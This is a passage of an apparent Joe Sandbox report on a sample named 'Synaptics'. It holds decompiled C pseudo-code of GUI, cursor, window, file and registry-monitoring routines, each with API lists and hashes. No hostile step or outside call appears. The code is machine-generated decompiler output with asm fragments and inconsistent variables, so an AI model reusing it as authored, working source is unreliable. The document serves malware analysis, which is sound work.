                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                                                                            				intOrPtr _t123;
                                                                                                                                                                                                                            				intOrPtr _t124;
                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = __fp0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t88 = __edx;
                                                                                                                                                                                                                            				_t124 = __eax;
                                                                                                                                                                                                                            				 *0x49eb34 = __eax;
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x439471);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t134;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				 *0x49eb3c = 0;
                                                                                                                                                                                                                            				_t135 =  *((char*)(__eax + 0x9b));
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x9b)) != 0) {
                                                                                                                                                                                                                            					E00403DE8(__eax, __eflags);
                                                                                                                                                                                                                            					__eflags =  *0x49eb34;
                                                                                                                                                                                                                            					if( *0x49eb34 != 0) {
                                                                                                                                                                                                                            						__eflags = _v12;
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							_v12 = E00438690(1, _t124);
                                                                                                                                                                                                                            							 *0x49eb3c = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                                                                                                                                                                                            						_t105 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                                                                                                                                                                                            						__eflags = _t54;
                                                                                                                                                                                                                            						if(_t54 == 0) {
                                                                                                                                                                                                                            							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								E004197DC(0,  &_v36, 0);
                                                                                                                                                                                                                            								E0043AA94(_t129,  &_v28,  &_v36);
                                                                                                                                                                                                                            								_t60 = _v12;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                            								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                                                                                                                                                                                            								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
                                                                                                                                                                                                                            								_t65 = _v12;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t116 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            							_t71 = E00403D78(_t129, _t116);
                                                                                                                                                                                                                            							__eflags = _t71;
                                                                                                                                                                                                                            							if(_t71 != 0) {
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							GetCursorPos( &_v20);
                                                                                                                                                                                                                            							_t74 = _v12;
                                                                                                                                                                                                                            							 *(_t74 + 0x44) = _v20.x;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							GetWindowRect(E00441704(_t128), _v12 + 0x44);
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                            							E0043915C(_v12, _v8, _t88, _t133, _t137);
                                                                                                                                                                                                                            							_pop(_t115);
                                                                                                                                                                                                                            							 *[fs:eax] = _t115;
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t120);
                                                                                                                                                                                                                            					 *[fs:eax] = _t120;
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403DE8(__eax, _t135);
                                                                                                                                                                                                                            				if( *0x49eb34 != 0) {
                                                                                                                                                                                                                            					__eflags = _v12;
                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                            						_v12 = E00438578(_t124, 1);
                                                                                                                                                                                                                            						 *0x49eb3c = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t123);
                                                                                                                                                                                                                            				 *[fs:eax] = _t123;
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: \`C$tC
                                                                                                                                                                                                                            • API String ID: 0-3452953066
                                                                                                                                                                                                                            • Opcode ID: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                                                            • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				intOrPtr* _t41;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                            				long _t58;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				long long _t87;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t87 = __fp0;
                                                                                                                                                                                                                            				_t80 = _t79 + 0xfffffff8;
                                                                                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                            				_t77 = __eax;
                                                                                                                                                                                                                            				 *0x49eb38 = __eax;
                                                                                                                                                                                                                            				_t24 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                                                                                                                                                                                            				GetCursorPos(0x49eb44);
                                                                                                                                                                                                                            				_t26 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				_t58 = 0x49eb44->x; // 0x0
                                                                                                                                                                                                                            				 *(_t26 + 0xc) = _t58;
                                                                                                                                                                                                                            				_t59 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                                                                                                                                                                                                            				 *0x49eb4c = GetCursor();
                                                                                                                                                                                                                            				_t28 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *0x49eb40 = E00438388(_t28);
                                                                                                                                                                                                                            				 *0x49eb50 = _t70;
                                                                                                                                                                                                                            				_t60 =  *0x4360a0; // 0x4360ec
                                                                                                                                                                                                                            				if(E00403D78(_t77, _t60) == 0) {
                                                                                                                                                                                                                            					__eflags = _t45;
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						 *0x49eb54 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t65 = _t77;
                                                                                                                                                                                                                            					_t4 = _t65 + 0x44; // 0x44
                                                                                                                                                                                                                            					_t41 = _t4;
                                                                                                                                                                                                                            					_t49 =  *_t41;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                                                                                                                                                                                                            						asm("fild dword [esp]");
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                                                                                                                                                                                                            						asm("fild dword [esp+0x4]");
                                                                                                                                                                                                                            						asm("fdivp st1, st0");
                                                                                                                                                                                                                            						 *((long long*)(_t65 + 0x20)) = __fp0;
                                                                                                                                                                                                                            						asm("wait");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t66 =  *((intOrPtr*)(_t41 + 4));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t53 = _t77;
                                                                                                                                                                                                                            						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                                                                                                                                                                                                            						asm("fild dword [esp]");
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                                                                                                                                                                                                            						asm("fild dword [esp+0x4]");
                                                                                                                                                                                                                            						asm("fdivp st1, st0");
                                                                                                                                                                                                                            						 *((long long*)(_t53 + 0x28)) = _t87;
                                                                                                                                                                                                                            						asm("wait");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                            						 *0x49eb54 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 2;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t77 + 0x30))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t32 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
                                                                                                                                                                                                                            				_t85 =  *0x49eb58;
                                                                                                                                                                                                                            				if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            					_t37 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            					_t38 = GetDesktopWindow();
                                                                                                                                                                                                                            					_t39 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            					E00443038(_t39, _t38, _t85, _t37);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t35 = E00403BBC(1);
                                                                                                                                                                                                                            				 *0x49eb60 = _t35;
                                                                                                                                                                                                                            				if( *0x49eb54 != 0) {
                                                                                                                                                                                                                            					_t35 = E00438E8C(0x49eb44, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t35;
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                                                                                                                                                                                            • GetCursor.USER32(0049EB44), ref: 00439199
                                                                                                                                                                                                                              • Part of subcall function 00438388: SetCapture.USER32(00000000,Function_0003850C,00000000,?,004391AD,0049EB44), ref: 00438397
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043928B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 669539147-1847193361
                                                                                                                                                                                                                            • Opcode ID: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                                                            • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				char _t23;
                                                                                                                                                                                                                            				struct HWND__* _t42;
                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            				intOrPtr* _t59;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                                                                                                                                                                                            				 *_t59 = __edx;
                                                                                                                                                                                                                            				_t54 = __eax;
                                                                                                                                                                                                                            				_t42 =  *(__eax + 0x180);
                                                                                                                                                                                                                            				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                                                                                                                                                                                            					_t23 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t23 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t59 + 8)) = _t23;
                                                                                                                                                                                                                            				if( *((char*)(_t59 + 8)) != 0) {
                                                                                                                                                                                                                            					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t56 = E0043E434(_t54) - 1;
                                                                                                                                                                                                                            				if(_t56 < 0) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					return E0043DFC4();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t57 = _t56 + 1;
                                                                                                                                                                                                                            					_t58 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t43 = E0043E3F8(_t54, _t58);
                                                                                                                                                                                                                            						_t47 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *((char*)(_t59 + 8)) == 0) {
                                                                                                                                                                                                                            								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t58 = _t58 + 1;
                                                                                                                                                                                                                            						_t57 = _t57 - 1;
                                                                                                                                                                                                                            					} while (_t57 != 0);
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004412D7
                                                                                                                                                                                                                            • ScrollWindow.USER32 ref: 00441306
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ScrollVisible
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 4127837035-1085749316
                                                                                                                                                                                                                            • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                             • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                            • String ID: lI
                                                                                                                                                                                                                            • API String ID: 1378416451-2224401619
                                                                                                                                                                                                                            • Opcode ID: 276f590887ad0535c7e68d232454b0f634ad648d5ad298078717613331d07dc5
                                                                                                                                                                                                                            • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276f590887ad0535c7e68d232454b0f634ad648d5ad298078717613331d07dc5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00494694(void* __eax) {
                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x48)) = 5;
                                                                                                                                                                                                                            				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
                                                                                                                                                                                                                            				asm("cmc");
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
                                                                                                                                                                                                                            				if(_t18 != 0) {
                                                                                                                                                                                                                            					_t20 = E0040D144("Can not start monitoring", 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            					return _t20;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Can not start monitoring, xrefs: 004946E3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateEvent$ChangeNotifyValue
                                                                                                                                                                                                                            • String ID: Can not start monitoring
                                                                                                                                                                                                                            • API String ID: 2233126570-3835272546
                                                                                                                                                                                                                            • Opcode ID: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                                                            • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				struct HWND__* _t20;
                                                                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t20 = __eax;
                                                                                                                                                                                                                            				_t1 =  &_a4; // 0x443144
                                                                                                                                                                                                                            				_t23 =  *_t1;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t4 =  &_v12; // 0x443144
                                                                                                                                                                                                                            				ClientToScreen(__eax, _t4);
                                                                                                                                                                                                                            				GetWindowRect(_t20,  &_v28);
                                                                                                                                                                                                                            				_t6 =  &_v12; // 0x443144
                                                                                                                                                                                                                            				 *_t23 =  *_t6 - _v28.left;
                                                                                                                                                                                                                            				_t19 = _v8 - _v28.top;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                                                                                                                                                                                            				return _t19;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientRectScreenWindow
                                                                                                                                                                                                                            • String ID: D1D$D1D
                                                                                                                                                                                                                            • API String ID: 3371951266-2689743835
